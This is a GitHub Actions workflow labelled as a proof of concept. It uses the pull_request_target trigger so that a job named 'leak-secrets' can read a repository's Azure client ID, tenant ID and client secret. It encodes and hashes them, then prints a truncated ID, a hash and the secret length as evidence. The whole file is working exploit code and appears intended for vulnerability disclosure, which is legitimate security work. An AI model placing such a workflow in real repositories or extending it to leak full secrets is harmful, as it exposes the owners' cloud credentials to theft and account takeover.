name: PoC - Secret Exposure

on:
  pull_request_target:

jobs:
  leak-secrets:
    runs-on: ubuntu-latest
    steps:
      - name: Exfiltrate secrets
        run: |
          echo "BASE64_CLIENT_ID=$(echo -n '${{ secrets.AZURE_CLIENT_ID }}' | base64)" >> $GITHUB_ENV
          echo "TENANT_ID_SHA1=$(echo -n '${{ secrets.AZURE_TENANT_ID }}' | sha1sum | cut -d' ' -f1)" >> $GITHUB_ENV
          echo "SECRET_LEN=$(echo -n '${{ secrets.AZURE_CLIENT_SECRET }}' | wc -c)" >> $GITHUB_ENV

      - name: Print proof
        run: |
          echo "Encoded Client ID (partial): ${BASE64_CLIENT_ID:0:15}..."
          echo "Tenant ID (SHA1): $TENANT_ID_SHA1"
          echo "Client Secret Length: $SECRET_LEN"
